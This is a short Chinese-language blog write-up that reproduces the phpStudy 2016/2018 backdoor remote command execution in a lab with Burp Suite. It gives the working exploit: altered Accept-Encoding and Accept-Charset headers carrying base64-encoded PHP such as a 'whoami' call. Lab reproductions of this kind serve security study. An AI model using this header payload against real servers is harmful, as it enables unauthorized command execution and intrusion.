phpstudy_2016-2018_rce_backdoor后门漏洞复现

phpstudy_2016-2018_rce_backdoor复现

漏洞描述

  • 攻击者可以利用该漏洞执行PHP 命令,也可以称作phpStudy 后门。

  • RCE,Remote Command| Code Execute。

影响版本

  • phpStudy 2016
  • phpStudy 2018

利用代码

Accept-Charset: (命令的base64编码,例如system("whoami");进行编码)
Accept-Encoding: gzip,deflate #此处删除中间的空格

实现过程

  • 此处使用的windows_server2016开启phpstudy,版本号为5.4.45
  • 选择非服务模式

phpstudy_2016-2018_rce_backdoor后门漏洞复现_第1张图片

  • 打开kali的burpsuite,选中proxy模块,选择打开浏览器
  • 进入浏览器后访问php页面

phpstudy_2016-2018_rce_backdoor后门漏洞复现_第2张图片

  • 点击HTTP history查看刚才的页面(有响应的),然后右键点击或者ctrl+r发送给repeater模块

  • 将图中reque框选部分改为如图,随后发送即可执行命令

  • 删除delate前空格,添加Accept-Charset:信息

  • 将所需执行命令base64编码

    system("whoami");
    to base64
    c3lzdGVtKCJ3aG9hbWkiKTs=
    

phpstudy_2016-2018_rce_backdoor后门漏洞复现_第3张图片

phpstudy_2016-2018_rce_backdoor后门漏洞复现_第4张图片

你可能感兴趣的:(web安全,网络安全,服务器,运维,linux,php,安全威胁分析)